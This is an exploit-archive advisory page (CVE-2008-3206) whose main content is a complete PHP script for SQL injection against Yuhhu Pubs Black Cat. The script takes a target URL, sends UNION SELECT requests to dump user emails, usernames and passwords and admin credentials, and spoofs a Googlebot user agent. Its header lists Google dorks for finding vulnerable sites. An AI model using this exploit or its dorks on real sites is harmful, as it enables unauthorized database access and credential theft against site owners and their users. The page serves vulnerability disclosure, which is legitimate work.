Register | Forget Password | Login
Search :
SecurityReason

News

Search

SecurityAlert

About SecurityAlert

ExploitAlert

SecurityReason Research

WLB

WLB Database

Send to WLB

About WLB

RSS

News

SecurityAlert

World Laboratory of Bugtraq

ExploitAlert

Apache

PHP

Corporate

Contact

About us

Services

SecurePHP

Note

If you have found a vulnerability, please send to our SecurityAlert Database :
secalert()securityreason()com

Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com

Details : SecurityAlert

  Topic : Yuhhu Pubs Black Cat Remote SQL Injection Exploit
  SecurityAlert : 4008
  CVE : CVE-2008-3206
  CWE : CWE-89
  SecurityRisk : Medium  alert  (About)
  Remote Exploit : Yes
  Local Exploit : No
  Victim interaction required : No
  Exploit Given : Yes
  Credit : RMx
  Published : 20.07.2008

  Affected Software : Iamilkay, Yuhhu_pubs_black_cat



  Advisory Text :  

<?php

/*

Coded By RMx

Yuhhu Pubs Black Cat Remote SQL Injection Exploit

Coderx.Org & Biyosecurity.com

Thanx : Liz0zim - Otistiq

Script Demo & Sales :
http://www.iamilkay.net/index.php/scriptler/arkadaslikscriptleri/yuhhusc
ript/6-yuhhuserisi/8-pubs

Dork --> inurl: browse.groups.php

Dork 2 --> inurl:browse.events.php

Dork 3 --> browse.music.php

Dork 4 --> browse.groups.php

*/

set_time_limit(0);

error_reporting(0);

echo "

<title>Yuhhu Pubs Exploit [ Coded By RMx ]</title>

<form action='' method=post>

USERS EXPLOIT :<br>

Örnek :http://www.example.com<br>

<input type=text name='site'>

<input type=submit value=RMx>

</form>";

if (isset($_POST['site']))

{

$site=$_POST['site'];

$hacker="browse.groups.php?category=-1+union+select+1,2,3,concat(0x656D6
1696C3A20,email,0x206B756C6C616E6963693A20,username,0x2073696672653A20,p
assword),5,6,7,8,9+from+joovili_users";

$curl = curl_init();

curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);

curl_setopt($curl, CURLOPT_URL, $site."/".$hacker);

curl_setopt($curl, CURLOPT_USERAGENT, 'Googlebot/2.1
(+http://www.google.com/bot.html)');

curl_setopt($curl, CURLOPT_REFERER, 'http://www.google.com');

$html = curl_exec($curl);

curl_close($curl);

preg_match_all('#<td
class=\"text_4_css_bold\">(.*)<\/td>#',$html,$huseyin);

foreach ($huseyin[1] as $biyosecurity)

{

echo $biyosecurity ."<br>";

}

}

echo "

<form action='' method=post>

ADMIN EXPLOIT :<br>

Örnek :http://www.example.com<br>

<input type=text name='admin'>

<input type=submit value=RMx>

</form>";

if (isset($_POST['admin']))

{

$site=$_POST['admin'];

$hacker="browse.groups.php?category=-1+union+select+1,2,3,concat(0x206B7
56C6C616E6963693A20,admin_username,0x2073696672653A20,admin_password),5,
6,7,8,9+from+joovili_admins";

$curl = curl_init();

curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);

curl_setopt($curl, CURLOPT_URL, $site."/".$hacker);

curl_setopt($curl, CURLOPT_USERAGENT, 'Googlebot/2.1
(+http://www.google.com/bot.html)');

curl_setopt($curl, CURLOPT_REFERER, 'http://www.google.com');

$html = curl_exec($curl);

curl_close($curl);

preg_match_all('#<td
class=\"text_4_css_bold\">(.*)<\/td>#',$html,$huseyin);

foreach ($huseyin[1] as $biyosecurity)

{

echo $biyosecurity ."<br>";

}

}

?>



  References :

http://xforce.iss.net/xforce/xfdb/43782
http://www.securityfocus.com/bid/30221
http://www.securityfocus.com/archive/1/archive/1/494319/100/0/threaded
http://secunia.com/advisories/31077



  Feedback :

If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
Alert

*BSD libc (strfmon) Multiple vulnerabilities

high- 2008-03-25

Maksymilian Arciemowicz discovered a Integer Overflow vulnerability in the libc library "strfmon()" function.A vulnerability could allow an attacker who successfully exploits this vulnerability to take control of the affected *BSD systems.

Apache rss

» Apache Tomcat information
   disclosure

» Apache Tomcat <=
   6.0.18 UTF8 Directory
   Traversal Vulnerability

» Apache Tomcat information
   disclosure vulnerability

» Apache Tomcat XSS
   vulnerability

PHP rss

» PHP 5.2.6 chdir(),ftok()
   (standard ext) safe_mode
   bypass

» PHP 5.2.6 posix_access()
   (posix ext) safe_mode
   bypass

» PHP 5.2.5 and prior :
   *printf() functions
   Integer Overflow

» PHP 5.2.5 cURL safe_mode
   bypass

Copyright © SecurityReason. All Rights Reserved.